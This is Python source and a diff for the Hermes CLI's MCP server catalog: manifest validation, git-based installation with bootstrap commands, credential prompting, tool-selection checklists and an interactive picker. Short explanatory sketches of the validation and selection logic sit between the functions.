# If declared, these tool names are pre-checked in the checklist (or
# applied directly when probe fails). If None, all probed tools are
# pre-checked (or no filter is written when probe fails).
default_enabled: Optional[List[str]] = None
@dataclass
class CatalogEntry:
name: str
description: str
source: str
transport: TransportSpec
auth: AuthSpec
tools: ToolsSpec = field(default_factory=ToolsSpec)
install: Optional[InstallSpec] = None
post_install: str = ""
manifest_path: Path = field(default_factory=Path)
# ─── Manifest loader ─────────────────────────────────────────────────────────
class CatalogError(Exception):
"""Manifest parse/validation failure or install error."""
def _catalog_root() -> Path:
"""Return the optional-mcps/ directory shipped with this Hermes install."""
# Prefer the env-var override / packaged location; fall back to the repo's
# optional-mcps/ next to the package (source checkout).
return get_optional_mcps_dir(Path(__file__).parent.parent / "optional-mcps")
def _parse_env_spec(raw: Any) -> EnvVarSpec:
if not isinstance(raw, dict):
raise CatalogError(f"env entry must be a mapping, got {type(raw).__name__}")
name = raw.get("name") or ""
if not name or not re.match(r"^[A-Za-z_][A-Za-z0-9_]*$", name):
raise CatalogError(f"invalid env var name: {name!r}")
return EnvVarSpec(
name=name,
prompt=raw.get("prompt") or name,
required=bool(raw.get("required", True)),
secret=bool(raw.get("secret", True)),
default=str(raw.get("default") or ""),
)
def _parse_manifest(path: Path) -> CatalogEntry:
"""Read and validate a manifest.yaml. Raise CatalogError on any problem."""
try:
with open(path, "r", encoding="utf-8") as f:
data = yaml.safe_load(f) or {}
except Exception as exc:
raise CatalogError(f"failed to read {path}: {exc}") from exc
if not isinstance(data, dict):
raise CatalogError(f"{path}: manifest must be a mapping")
mv = data.get("manifest_version")
if mv != _MANIFEST_VERSION:
raise CatalogError(
f"{path}: manifest_version {mv!r} unsupported "
f"(this Hermes understands version {_MANIFEST_VERSION})"
)
name = data.get("name") or ""
if not name or not re.match(r"^[A-Za-z0-9_-]+$", name):
raise CatalogError(f"{path}: invalid or missing 'name'")
description = str(data.get("description") or "").strip()
if not description:
raise CatalogError(f"{path}: 'description' required")
source = str(data.get("source") or "").strip()
transport_raw = data.get("transport") or {}
if not isinstance(transport_raw, dict):
raise CatalogError(f"{path}: 'transport' must be a mapping")
t_type = transport_raw.get("type")
if t_type not in ("stdio", "http"):
raise CatalogError(f"{path}: transport.type must be 'stdio' or 'http'")
args = transport_raw.get("args") or []
if not isinstance(args, list):
raise CatalogError(f"{path}: transport.args must be a list")
transport = TransportSpec(
type=t_type,
command=transport_raw.get("command"),
args=[str(a) for a in args],
url=transport_raw.get("url"),
version=transport_raw.get("version"),
)
if t_type == "stdio" and not transport.command:
raise CatalogError(f"{path}: stdio transport requires 'command'")
if t_type == "http" and not transport.url:
raise CatalogError(f"{path}: http transport requires 'url'")
auth_raw = data.get("auth") or {"type": "none"}
if not isinstance(auth_raw, dict):
raise CatalogError(f"{path}: 'auth' must be a mapping")
a_type = auth_raw.get("type") or "none"
if a_type not in ("api_key", "oauth", "none"):
raise CatalogError(f"{path}: auth.type must be 'api_key'|'oauth'|'none'")
env_list_raw = auth_raw.get("env") or []
if not isinstance(env_list_raw, list):
raise CatalogError(f"{path}: auth.env must be a list")
env_list = [_parse_env_spec(e) for e in env_list_raw]
auth = AuthSpec(
type=a_type,
env=env_list,
provider=auth_raw.get("provider"),
scopes=list(auth_raw.get("scopes") or []),
env_var=auth_raw.get("env_var"),
)
tools_raw = data.get("tools") or {}
if not isinstance(tools_raw, dict):
raise CatalogError(f"{path}: 'tools' must be a mapping")
default_enabled = tools_raw.get("default_enabled")
if default_enabled is not None:
if not isinstance(default_enabled, list) or not all(
isinstance(t, str) for t in default_enabled
):
raise CatalogError(
f"{path}: tools.default_enabled must be a list of strings"
)
tools_spec = ToolsSpec(default_enabled=default_enabled)
install: Optional[InstallSpec] = None
install_raw = data.get("install")
if install_raw is not None:
if not isinstance(install_raw, dict):
raise CatalogError(f"{path}: 'install' must be a mapping")
i_type = install_raw.get("type")
if i_type != "git":
raise CatalogError(f"{path}: install.type must be 'git' (got {i_type!r})")
url = install_raw.get("url") or ""
ref = install_raw.get("ref") or ""
if not url or not ref:
raise CatalogError(f"{path}: install.url and install.ref are required")
bootstrap = install_raw.get("bootstrap") or []
if not isinstance(bootstrap, list):
raise CatalogError(f"{path}: install.bootstrap must be a list")
install = InstallSpec(
type=i_type,
url=url,
ref=ref,
bootstrap=[str(c) for c in bootstrap],
)
return CatalogEntry(
name=name,
description=description,
source=source,
transport=transport,
auth=auth,
tools=tools_spec,
install=install,
post_install=str(data.get("post_install") or ""),
manifest_path=path,
)
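To make the validation rules concrete, here is a reduced sketch that applies a subset of them to an in-memory mapping. The manifest contents (`example-server`, `EXAMPLE_API_KEY`, the `npx` arguments) are invented for illustration and do not correspond to a real catalog entry. Unlike `_parse_manifest`, which raises `CatalogError` on the first problem, this hypothetical `validate_manifest` collects every problem it finds.

```python
import re

MANIFEST_VERSION = 1
NAME_RE = re.compile(r"^[A-Za-z0-9_-]+$")
ENV_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def validate_manifest(data: dict) -> list[str]:
    """Return a list of problems; an empty list means these checks passed."""
    problems = []
    if data.get("manifest_version") != MANIFEST_VERSION:
        problems.append("unsupported manifest_version")
    if not NAME_RE.match(data.get("name") or ""):
        problems.append("invalid or missing name")
    if not str(data.get("description") or "").strip():
        problems.append("description required")
    transport = data.get("transport") or {}
    t_type = transport.get("type")
    if t_type not in ("stdio", "http"):
        problems.append("transport.type must be 'stdio' or 'http'")
    elif t_type == "stdio" and not transport.get("command"):
        problems.append("stdio transport requires command")
    elif t_type == "http" and not transport.get("url"):
        problems.append("http transport requires url")
    auth = data.get("auth") or {"type": "none"}
    for env in auth.get("env") or []:
        if not ENV_NAME_RE.match(env.get("name") or ""):
            problems.append(f"invalid env var name: {env.get('name')!r}")
    return problems


# Hypothetical manifest, shown as the mapping yaml.safe_load would produce.
example = {
    "manifest_version": 1,
    "name": "example-server",
    "description": "Hypothetical entry used only for this sketch",
    "transport": {"type": "stdio", "command": "npx", "args": ["-y", "example-mcp"]},
    "auth": {"type": "api_key", "env": [{"name": "EXAMPLE_API_KEY", "prompt": "API key"}]},
}

if __name__ == "__main__":
    print(validate_manifest(example))
```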
def list_catalog() -> List[CatalogEntry]:
"""Return all valid catalog entries, sorted by name.
Invalid manifests are skipped silently (CI tests catch them at PR time).
Manifests with a future ``manifest_version`` are also skipped, but the
skip is surfaced via :func:`catalog_diagnostics` so the picker / catalog
UIs can tell the user their Hermes is out of date.
"""
root = _catalog_root()
if not root.exists():
return []
entries: List[CatalogEntry] = []
_CATALOG_DIAGNOSTICS.clear()
for child in sorted(root.iterdir()):
manifest = child / "manifest.yaml"
if not manifest.is_file():
continue
try:
entries.append(_parse_manifest(manifest))
except CatalogError as exc:
msg = str(exc)
# Recognize the future-manifest error specifically so the UI can
# surface a more actionable nudge than "broken manifest".
if "manifest_version" in msg and "unsupported" in msg:
_CATALOG_DIAGNOSTICS.append((child.name, "future_manifest", msg))
else:
_CATALOG_DIAGNOSTICS.append((child.name, "invalid", msg))
continue
return entries
# Populated by list_catalog(). Inspected by the picker / catalog UIs so the
# user gets actionable feedback instead of a silently-shorter list.
_CATALOG_DIAGNOSTICS: List[tuple] = []
def catalog_diagnostics() -> List[tuple]:
"""Diagnostics from the most recent :func:`list_catalog` call.
Returns a list of ``(entry_name, kind, message)`` tuples where ``kind``
is one of:
- ``future_manifest``: manifest_version is newer than this Hermes
understands. Update Hermes to install this entry.
- ``invalid``: manifest is malformed in some other way (caught by
CI for shipped manifests; user-modified manifests can hit this).
"""
return list(_CATALOG_DIAGNOSTICS)
def get_entry(name: str) -> Optional[CatalogEntry]:
"""Look up a single entry by name. ``official/<name>`` prefix accepted."""
if name.startswith("official/"):
name = name[len("official/"):]
for entry in list_catalog():
if entry.name == name:
return entry
return None
# ─── Status helpers ──────────────────────────────────────────────────────────
def installed_servers() -> Dict[str, dict]:
"""Return current ``mcp_servers`` block from config.yaml."""
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
return servers if isinstance(servers, dict) else {}
def is_installed(name: str) -> bool:
return name in installed_servers()
def is_enabled(name: str) -> bool:
servers = installed_servers()
cfg = servers.get(name)
if not cfg:
return False
enabled = cfg.get("enabled", True)
if isinstance(enabled, str):
return enabled.lower() in {"true", "1", "yes"}
return bool(enabled)
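The ``enabled`` coercion in ``is_enabled`` can be tried in isolation with a minimal sketch. ``coerce_enabled`` is a hypothetical helper name used only for illustration; it takes the server block directly instead of reading config.yaml.

```python
from typing import Any, Optional


def coerce_enabled(server_cfg: Optional[dict]) -> bool:
    """Hypothetical stand-alone version of the is_enabled() coercion."""
    if not server_cfg:
        # Missing or empty server block counts as "not enabled".
        return False
    # An absent "enabled" key defaults to on.
    enabled: Any = server_cfg.get("enabled", True)
    if isinstance(enabled, str):
        # YAML values that arrive as strings are matched case-insensitively.
        return enabled.lower() in {"true", "1", "yes"}
    return bool(enabled)
```

Any string outside ``true`` / ``1`` / ``yes`` (for example ``"on"``) is treated as disabled under this rule.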
# ─── Install ─────────────────────────────────────────────────────────────────
def _install_root() -> Path:
"""Where git-bootstrapped MCPs are cloned. Per-user, profile-aware."""
root = get_hermes_home() / "mcp-installs"
root.mkdir(parents=True, exist_ok=True)
return root
def _run_bootstrap(cwd: Path, commands: List[str]) -> None:
"""Execute bootstrap commands in *cwd*. Raise CatalogError on first failure.
Each command runs through the shell (so `&&` etc. work). The output is
streamed to the user's terminal for visibility.
"""
for cmd in commands:
print(color(f" $ {cmd}", Colors.DIM))
proc = subprocess.run(cmd, cwd=str(cwd), shell=True)
if proc.returncode != 0:
raise CatalogError(
f"bootstrap step failed (exit {proc.returncode}): {cmd}"
)
def _do_git_install(entry: CatalogEntry) -> Path:
"""Clone the entry's repo into ``~/.hermes/mcp-installs/<name>`` and run
bootstrap commands. Returns the install directory."""
assert entry.install is not None and entry.install.type == "git"
install = entry.install
dest = _install_root() / entry.name
git = shutil.which("git")
if not git:
raise CatalogError("git is required to install this MCP but was not found on PATH")
if dest.exists():
# Fresh checkout each install — manifest version is the source of truth,
# so wipe + re-clone for determinism.
print(color(f" Removing existing install at {dest}", Colors.DIM))
shutil.rmtree(dest)
print(color(f" Cloning {install.url} ({install.ref}) → {dest}", Colors.CYAN))
# `git clone --branch` only accepts branches and tags, NOT commit SHAs.
# Detecting SHA-shaped refs upfront avoids a guaranteed stderr leak on
# the fast path (the --branch attempt would always fail noisily for a
# SHA ref before we fall back to full-clone-then-checkout).
is_sha_ref = bool(re.fullmatch(r"[0-9a-f]{7,40}", install.ref))
if not is_sha_ref:
proc = subprocess.run(
[git, "clone", "--depth", "1", "--branch", install.ref, install.url, str(dest)],
)
if proc.returncode != 0:
# Branch/tag form failed (unlikely for valid manifests; possible if
# the ref was deleted upstream). Fall through to the full-clone path.
if dest.exists():
shutil.rmtree(dest)
is_sha_ref = True # treat the same as a SHA ref from here
if is_sha_ref:
proc = subprocess.run([git, "clone", install.url, str(dest)])
if proc.returncode != 0:
raise CatalogError(f"git clone failed for {install.url}")
proc = subprocess.run([git, "-C", str(dest), "checkout", install.ref])
if proc.returncode != 0:
raise CatalogError(f"git checkout {install.ref} failed")
if install.bootstrap:
_run_bootstrap(dest, install.bootstrap)
return dest
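The ref handling in ``_do_git_install`` can be sketched as a pure function that returns the git argument lists it would run. ``is_sha_shaped`` and ``clone_commands`` are hypothetical names for illustration, and the sketch leaves out the fallback taken when the ``--branch`` clone fails.

```python
import re
from typing import List


def is_sha_shaped(ref: str) -> bool:
    """True for 7 to 40 lowercase hex characters, the same pattern as above."""
    return bool(re.fullmatch(r"[0-9a-f]{7,40}", ref))


def clone_commands(url: str, ref: str, dest: str) -> List[List[str]]:
    """Hypothetical planner: which git invocations a given ref leads to."""
    if is_sha_shaped(ref):
        # `git clone --branch` rejects commit SHAs, so clone fully, then checkout.
        return [
            ["git", "clone", url, dest],
            ["git", "-C", dest, "checkout", ref],
        ]
    # Branches and tags can use the shallow single-step form.
    return [["git", "clone", "--depth", "1", "--branch", ref, url, dest]]
```

A branch or tag whose name happens to be all lowercase hex (say ``deadbeef``) is also classified as SHA-shaped. That costs a full clone, but the later checkout still resolves it.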
def _expand_install_dir(value: str, install_dir: Optional[Path]) -> str:
if _INSTALL_DIR_VAR not in value:
return value
if install_dir is None:
raise CatalogError(
f"manifest references {_INSTALL_DIR_VAR} but no install block exists"
)
return value.replace(_INSTALL_DIR_VAR, str(install_dir))
def _prompt_env_vars(specs: List[EnvVarSpec]) -> Dict[str, str]:
"""Walk the env spec list, prompting the user for each. Writes secrets and
non-secrets alike to ~/.hermes/.env via save_env_value()."""
collected: Dict[str, str] = {}
for spec in specs:
existing = get_env_value(spec.name)
if existing:
print(color(f"{spec.name} already set in .env", Colors.GREEN))
collected[spec.name] = existing
continue
value = _prompt_input(
spec.prompt,
default=spec.default or None,
password=spec.secret,
)
if not value:
if spec.required:
raise CatalogError(f"{spec.name} is required but no value was provided")
continue
save_env_value(spec.name, value)
collected[spec.name] = value
return collected
def _build_server_config(
entry: CatalogEntry, install_dir: Optional[Path]
) -> dict:
"""Translate a manifest into the ``mcp_servers.<name>`` block format used
by hermes_cli/mcp_config.py."""
cfg: dict = {}
t = entry.transport
if t.type == "stdio":
cfg["command"] = _expand_install_dir(t.command or "", install_dir)
if t.args:
cfg["args"] = [_expand_install_dir(a, install_dir) for a in t.args]
elif t.type == "http":
cfg["url"] = t.url
if entry.auth.type == "oauth":
cfg["auth"] = "oauth"
return cfg
def _read_prior_tool_selection(name: str) -> Optional[List[str]]:
"""Return the user's prior `tools.include` for *name*, if any.
Used during reinstalls so the install-time checklist starts pre-checked
with whatever the user already had. Tools no longer on the server are
silently dropped at checklist-display time.
"""
servers = installed_servers()
cfg = servers.get(name) or {}
tools_cfg = cfg.get("tools") or {}
if not isinstance(tools_cfg, dict):
return None
include = tools_cfg.get("include")
if isinstance(include, list) and all(isinstance(t, str) for t in include):
return list(include)
return None
def _probe_tools(name: str) -> Optional[List[tuple]]:
"""Connect to a freshly-configured MCP and list its tools.
Returns a list of ``(tool_name, description)`` tuples on success, or
``None`` on any failure (server unreachable, OAuth not yet completed,
backing service offline, etc.). Failures are intentionally swallowed
here; the fallback path in :func:`_apply_tool_selection` handles them.
"""
servers = installed_servers()
server_cfg = servers.get(name)
if not server_cfg:
return None
try:
# Import lazily so the catalog module stays cheap to load.
from hermes_cli.mcp_config import _probe_single_server
tools = _probe_single_server(name, server_cfg)
return list(tools) if tools is not None else []
except Exception as exc:
# Display the cause but never raise from the install path.
print(color(f" Probe failed: {exc}", Colors.YELLOW))
return None
def _write_tools_include(name: str, include: Optional[List[str]]) -> None:
"""Persist or clear ``mcp_servers.<name>.tools.include``."""
cfg = load_config()
servers = cfg.setdefault("mcp_servers", {})
server_entry = servers.get(name) or {}
if include is None:
# No filter — drop any existing tools block.
server_entry.pop("tools", None)
else:
tools_block = server_entry.get("tools") or {}
if not isinstance(tools_block, dict):
tools_block = {}
tools_block["include"] = list(include)
tools_block.pop("exclude", None)
server_entry["tools"] = tools_block
servers[name] = server_entry
cfg["mcp_servers"] = servers
save_config(cfg)
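The effect of ``_write_tools_include`` on a single server block can be sketched without touching config.yaml. ``apply_include`` is a hypothetical helper name; unlike the function above, it returns a modified copy instead of saving.

```python
from typing import List, Optional


def apply_include(server_entry: dict, include: Optional[List[str]]) -> dict:
    """Hypothetical pure version of the include/clear logic."""
    entry = dict(server_entry)  # shallow copy so the caller's dict is untouched
    if include is None:
        # No filter: drop the whole tools block.
        entry.pop("tools", None)
        return entry
    tools = entry.get("tools")
    # A non-dict tools value is discarded, as in the original.
    tools = dict(tools) if isinstance(tools, dict) else {}
    tools["include"] = list(include)
    tools.pop("exclude", None)  # include-mode replaces any exclude list
    entry["tools"] = tools
    return entry
```

Note the difference between ``None`` (no filter, every tool loads) and ``[]`` (an empty include list, so nothing loads until reconfigured).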
def _apply_tool_selection(
entry: CatalogEntry, *, prior_selection: Optional[List[str]]
) -> None:
"""Probe the server and let the user pick which tools to enable.
Probe-success path:
- Curses checklist of all probed tools.
- Pre-check uses (in priority order):
1. *prior_selection* (reinstall: preserve what the user had)
2. manifest's ``tools.default_enabled``
3. all tools (default)
- All-on selection clears any filter (no ``tools.include`` written).
- Sub-selection writes ``tools.include``.
Probe-fail path:
- If the manifest declares ``tools.default_enabled``, apply it directly.
- Otherwise leave config with no filter (all on when reachable).
- Either way, point the user at ``hermes mcp configure <name>``.
"""
print()
print(color(f" Probing '{entry.name}' for available tools...", Colors.CYAN))
probed = _probe_tools(entry.name)
# Probe failure path
if probed is None:
manifest_default = entry.tools.default_enabled
if manifest_default:
_write_tools_include(entry.name, manifest_default)
print(color(
f" Couldn\'t probe server. Applied manifest default "
f"({len(manifest_default)} tools). "
f"Run `hermes mcp configure {entry.name}` after the server "
"is reachable to refine.",
Colors.YELLOW,
))
else:
_write_tools_include(entry.name, None)
print(color(
f" Couldn\'t probe server; installed with no tool filter "
"(all tools enabled when reachable). "
f"Run `hermes mcp configure {entry.name}` after first "
"connect to prune.",
Colors.YELLOW,
))
return
if not probed:
# Probe succeeded but server reported zero tools. Nothing to filter.
_write_tools_include(entry.name, None)
print(color(" Server reported no tools.", Colors.YELLOW))
return
tool_names = [t[0] for t in probed]
# Build the pre-checked set in priority order
if prior_selection:
pre_set = {n for n in prior_selection if n in tool_names}
elif entry.tools.default_enabled:
pre_set = {n for n in entry.tools.default_enabled if n in tool_names}
else:
pre_set = set(tool_names)
pre_indices = {i for i, n in enumerate(tool_names) if n in pre_set}
# Non-TTY: skip the checklist. Priority matches the interactive
# pre-check priority: prior user selection > manifest default > all-on.
import sys as _sys
if not _sys.stdin.isatty():
if prior_selection is not None:
include = [n for n in prior_selection if n in tool_names]
_write_tools_include(entry.name, include)
elif entry.tools.default_enabled:
include = [n for n in entry.tools.default_enabled if n in tool_names]
_write_tools_include(entry.name, include)
else:
_write_tools_include(entry.name, None)
return
print(color(
f" Found {len(probed)} tool(s). "
f"Pre-checked: {len(pre_indices)}.",
Colors.GREEN,
))
from hermes_cli.curses_ui import curses_checklist
labels = [
f"{n}  {(d[:60] + '...') if len(d) > 60 else d}"
for n, d in probed
]
chosen_indices = curses_checklist(
f"Select tools for '{entry.name}' (SPACE toggle, ENTER confirm)",
labels,
pre_indices,
)
if not chosen_indices:
# User unchecked everything; treat as "no tools" — write empty include
# so the server is installed but contributes nothing until reconfigured.
_write_tools_include(entry.name, [])
print(color(
f" No tools selected. Run `hermes mcp configure {entry.name}` "
"to change.",
Colors.YELLOW,
))
return
if len(chosen_indices) == len(probed):
# Everything selected — clear filter for the cleanest config shape.
# NOTE: this means any tools the server adds later (e.g. a future MCP
# version) will also be auto-enabled. To pin to the current set,
# the user can re-run `hermes mcp configure <name>` and unselect a
# tool to switch back to include-mode.
_write_tools_include(entry.name, None)
print(color(
f" ✓ All {len(probed)} tools enabled (no filter — new tools "
"the server adds later will be auto-enabled).",
Colors.GREEN,
))
return
chosen_names = [tool_names[i] for i in sorted(chosen_indices)]
_write_tools_include(entry.name, chosen_names)
print(color(
f"{len(chosen_names)}/{len(probed)} tools enabled.",
Colors.GREEN,
))
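The pre-check priority used on the probe-success path can be sketched as a small pure function. ``pre_checked`` is a hypothetical name; it mirrors the three-way fallback above, without the curses or config parts.

```python
from typing import List, Optional, Set


def pre_checked(
    tool_names: List[str],
    prior_selection: Optional[List[str]],
    manifest_default: Optional[List[str]],
) -> Set[str]:
    """Hypothetical helper: which tools start checked in the checklist."""
    if prior_selection:
        # Reinstall: keep what the user had, minus tools the server dropped.
        return {n for n in prior_selection if n in tool_names}
    if manifest_default:
        # First install with a manifest-declared default set.
        return {n for n in manifest_default if n in tool_names}
    # Otherwise everything starts checked.
    return set(tool_names)
```

Because the first branch tests truthiness, an empty prior selection falls through to the manifest default here, whereas the non-TTY branch above tests ``is not None`` and would keep the empty list.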
def install_entry(entry: CatalogEntry, *, enable: bool = True) -> None:
"""Install a catalog entry end-to-end.
Steps:
1. If ``install.type == git``, clone + run bootstrap commands.
2. If ``auth.type == api_key``, prompt for env vars, save to .env.
3. If ``auth.type == oauth`` (remote MCP / case 1), write the
``auth: oauth`` marker (MCP client handles browser on first connect
in the non-pre-authenticated case).
4. Translate the manifest into an ``mcp_servers.<name>`` block and
save into config.yaml.
5. Probe the server, present a curses checklist for tool selection,
write ``tools.include`` (or no filter, depending on choice).
If probe fails, fall back to the manifest's
``tools.default_enabled`` or all-on.
6. Print post_install notes.
"""
print()
print(color(f" Installing MCP '{entry.name}'", Colors.CYAN + Colors.BOLD))
if entry.description:
print(color(f" {entry.description}", Colors.DIM))
if entry.source:
print(color(f" Source: {entry.source}", Colors.DIM))
print()
install_dir: Optional[Path] = None
if entry.install is not None:
install_dir = _do_git_install(entry)
# Auth
if entry.auth.type == "api_key":
print()
print(color(" Configure credentials:", Colors.CYAN))
_prompt_env_vars(entry.auth.env)
elif entry.auth.type == "oauth":
if entry.auth.provider:
# Case 2: provider-mediated (Google, GitHub, etc.). We rely on
# the existing `hermes auth <provider>` flow. Surface guidance
# here rather than auto-running it — keeps the catalog install
# decoupled from provider-auth lifecycle.
print(color(
f" This MCP uses {entry.auth.provider} OAuth. Run "
f"`hermes auth {entry.auth.provider}` if you have not "
"already authenticated.",
Colors.YELLOW,
))
else:
print(color(
" This MCP uses native OAuth 2.1; tokens will be acquired "
"on first connection (browser flow).",
Colors.DIM,
))
# auth.type == "none": nothing to do.
# ── Preserve any prior user tool selection across reinstalls ────────
# Reading BEFORE we overwrite the entry below so a reinstall pre-checks
# whatever the user picked last time.
prior_selection = _read_prior_tool_selection(entry.name)
# Build and write the mcp_servers entry (without tools filter yet;
# _apply_tool_selection() finalizes it below).
server_cfg = _build_server_config(entry, install_dir)
server_cfg["enabled"] = enable
cfg = load_config()
cfg.setdefault("mcp_servers", {})[entry.name] = server_cfg
save_config(cfg)
# ── Probe + tool selection ──────────────────────────────────────────
_apply_tool_selection(entry, prior_selection=prior_selection)
print()
print(color(
f" ✓ Installed '{entry.name}' "
f"({'enabled' if enable else 'disabled'}). "
f"Start a new Hermes session to load its tools.",
Colors.GREEN,
))
if entry.post_install:
print()
for line in entry.post_install.strip().splitlines():
print(color(f" {line}", Colors.DIM))
print()
def uninstall_entry(name: str, *, purge_install_dir: bool = True) -> bool:
"""Remove a catalog-installed MCP from config and (optionally) wipe its
clone directory. Returns True if anything was removed."""
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
removed = False
if name in servers:
del servers[name]
if not servers:
cfg.pop("mcp_servers", None)
else:
cfg["mcp_servers"] = servers
save_config(cfg)
removed = True
if purge_install_dir:
clone = _install_root() / name
if clone.exists():
shutil.rmtree(clone)
removed = True
return removed
+27 -4
@@ -749,6 +749,24 @@ def mcp_command(args):
run_mcp_server(verbose=getattr(args, "verbose", False))
return
# Catalog subcommands live in mcp_picker / mcp_catalog. Import lazily so
# the original `mcp_config` module stays import-cheap.
if action == "picker":
from hermes_cli.mcp_picker import run_picker
run_picker()
return
if action == "catalog":
from hermes_cli.mcp_picker import show_catalog
show_catalog()
return
if action == "install":
from hermes_cli.mcp_picker import install_by_name
import sys as _sys
rc = install_by_name(getattr(args, "identifier", "") or "")
if rc:
_sys.exit(rc)
return
handlers = {
"add": cmd_mcp_add,
"remove": cmd_mcp_remove,
@@ -765,15 +783,20 @@ def mcp_command(args):
if handler:
handler(args)
else:
# No subcommand — show list
cmd_mcp_list()
# No subcommand — drop the user into the catalog picker. This is the
# "try enabling and it flows you into setup" UX matching `hermes plugin`.
from hermes_cli.mcp_picker import run_picker
run_picker()
print(color(" Commands:", Colors.CYAN))
_info("hermes mcp Open the catalog picker (default)")
_info("hermes mcp catalog List Nous-approved MCPs")
_info("hermes mcp install <name> Install a catalog MCP")
_info("hermes mcp serve Run as MCP server")
_info("hermes mcp add <name> --url <endpoint> Add an MCP server")
_info("hermes mcp add <name> --url <endpoint> Add a custom MCP server")
_info("hermes mcp add <name> --command <cmd> Add a stdio server")
_info("hermes mcp add <name> --preset <preset> Add from a known preset")
_info("hermes mcp remove <name> Remove a server")
_info("hermes mcp list List servers")
_info("hermes mcp list List configured servers")
_info("hermes mcp test <name> Test connection")
_info("hermes mcp configure <name> Toggle tools")
_info("hermes mcp login <name> Re-authenticate OAuth")
+322
@@ -0,0 +1,322 @@
"""MCP picker — interactive `hermes mcp picker` (also the default `hermes mcp`).
Lists every catalog entry plus any custom MCP servers the user has added via
``hermes mcp add``, lets them pick one, and routes to install / enable /
disable / uninstall / configure-tools flows.
Mirrors the `hermes plugin` picker UX: arrow keys to navigate, ENTER on a row
to act on it. The action depends on current status:
not installed (catalog)  -> install (clone/bootstrap if needed, prompt for creds)
installed / disabled     -> enable
installed / enabled      -> submenu: configure tools / disable / uninstall / reinstall
custom (non-catalog)     -> submenu: configure tools / enable / disable / remove
The picker loops until the user hits ESC/q so they can manage multiple
entries in one session.
"""
from __future__ import annotations
import sys
from dataclasses import dataclass
from typing import List, Optional
from hermes_cli.colors import Colors, color
from hermes_cli.cli_output import prompt_yes_no
from hermes_cli.curses_ui import curses_single_select
from hermes_cli.mcp_catalog import (
CatalogEntry,
CatalogError,
catalog_diagnostics,
install_entry,
is_enabled,
is_installed,
list_catalog,
installed_servers,
uninstall_entry,
)
from hermes_cli.config import load_config, save_config
# ─── Status badges ────────────────────────────────────────────────────────────
_STATUS_NOT_INSTALLED = "available"
_STATUS_DISABLED = "installed (disabled)"
_STATUS_ENABLED = "enabled"
_STATUS_CUSTOM_ENABLED = "custom — enabled"
_STATUS_CUSTOM_DISABLED = "custom — disabled"
# ─── Row model — unifies catalog and custom entries ──────────────────────────
@dataclass
class _Row:
"""A row in the picker. ``entry`` is set for catalog rows; for custom
user-added MCPs only ``name`` + ``description`` + status are populated."""
name: str
description: str
status: str
entry: Optional[CatalogEntry] = None # None for non-catalog (custom) rows
@property
def is_custom(self) -> bool:
return self.entry is None
def _build_rows() -> List[_Row]:
"""Return catalog rows + any custom (non-catalog) MCPs found in config."""
catalog_entries = list_catalog()
catalog_names = {e.name for e in catalog_entries}
rows: List[_Row] = []
for entry in catalog_entries:
if not is_installed(entry.name):
status = _STATUS_NOT_INSTALLED
elif is_enabled(entry.name):
status = _STATUS_ENABLED
else:
status = _STATUS_DISABLED
rows.append(
_Row(
name=entry.name,
description=entry.description,
status=status,
entry=entry,
)
)
# Custom MCPs the user added directly (not in the catalog)
for name, cfg in sorted(installed_servers().items()):
if name in catalog_names:
continue
enabled = cfg.get("enabled", True)
if isinstance(enabled, str):
enabled = enabled.lower() in {"true", "1", "yes"}
status = _STATUS_CUSTOM_ENABLED if enabled else _STATUS_CUSTOM_DISABLED
# Use the transport URL/command as the "description" for custom rows
desc = cfg.get("url") or cfg.get("command") or "(no transport)"
rows.append(_Row(name=name, description=str(desc), status=status))
return rows
def _format_row(row: _Row) -> str:
return f"{row.name:<18} {row.status:<24} {row.description}"
# ─── Actions ──────────────────────────────────────────────────────────────────
def _enable_disable(name: str, *, enable: bool) -> None:
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
server = servers.get(name)
if not server:
print(color(f" '{name}' is not installed.", Colors.RED))
return
server["enabled"] = enable
cfg["mcp_servers"] = servers
save_config(cfg)
print(color(
f"'{name}' {'enabled' if enable else 'disabled'}. "
"Start a new Hermes session for changes to take effect.",
Colors.GREEN,
))
def _configure_tools(name: str) -> None:
"""Open the tool selection checklist for an already-installed MCP.
Delegates to the existing ``cmd_mcp_configure`` flow which probes the
server, displays a checklist, and writes ``tools.include``.
"""
import argparse
from hermes_cli.mcp_config import cmd_mcp_configure
cmd_mcp_configure(argparse.Namespace(name=name))
def _remove_custom(name: str) -> None:
"""Remove a non-catalog MCP entry from config.yaml."""
cfg = load_config()
servers = cfg.get("mcp_servers") or {}
if name not in servers:
print(color(f" '{name}' is not configured.", Colors.RED))
return
if not prompt_yes_no(f"Remove '{name}' from mcp_servers?", default=False):
return
del servers[name]
if not servers:
cfg.pop("mcp_servers", None)
else:
cfg["mcp_servers"] = servers
save_config(cfg)
print(color(f" ✓ Removed '{name}'", Colors.GREEN))
def _handle_row(row: _Row) -> None:
"""Act on the picked row based on its current status."""
# === Catalog row, not yet installed ===
if row.entry and not is_installed(row.name):
try:
install_entry(row.entry, enable=True)
except CatalogError as exc:
print(color(f" ✗ install failed: {exc}", Colors.RED))
return
# === Catalog row, installed but disabled ===
if row.entry and not is_enabled(row.name):
_enable_disable(row.name, enable=True)
return
# === Catalog row, installed + enabled OR custom row ===
if row.is_custom:
# Custom (non-catalog) row submenu
actions = [
"Configure tools (probe server + re-pick)",
"Enable" if not is_enabled(row.name) else "Disable",
"Remove from config",
]
choice = curses_single_select(f"Action for '{row.name}' (custom)", actions)
if choice is None:
return
if choice == 0:
_configure_tools(row.name)
elif choice == 1:
_enable_disable(row.name, enable=not is_enabled(row.name))
elif choice == 2:
_remove_custom(row.name)
return
# Catalog row, installed + enabled
print()
print(color(f" '{row.name}' is already enabled.", Colors.DIM))
actions = [
"Configure tools (probe server + re-pick)",
"Disable (keep config, stop loading on next session)",
"Uninstall (remove config and any cloned files)",
"Reinstall (re-clone, re-prompt for credentials)",
]
choice = curses_single_select(f"Action for '{row.name}'", actions)
if choice is None:
return
if choice == 0:
_configure_tools(row.name)
elif choice == 1:
_enable_disable(row.name, enable=False)
elif choice == 2:
if prompt_yes_no(f"Uninstall '{row.name}'?", default=False):
if uninstall_entry(row.name):
print(color(
f" ✓ Uninstalled '{row.name}'. "
"Credentials in .env preserved — delete manually if no longer needed.",
Colors.GREEN,
))
else:
print(color(f" '{row.name}' was not installed", Colors.DIM))
elif choice == 3:
try:
assert row.entry is not None
install_entry(row.entry, enable=True)
except CatalogError as exc:
print(color(f" ✗ reinstall failed: {exc}", Colors.RED))
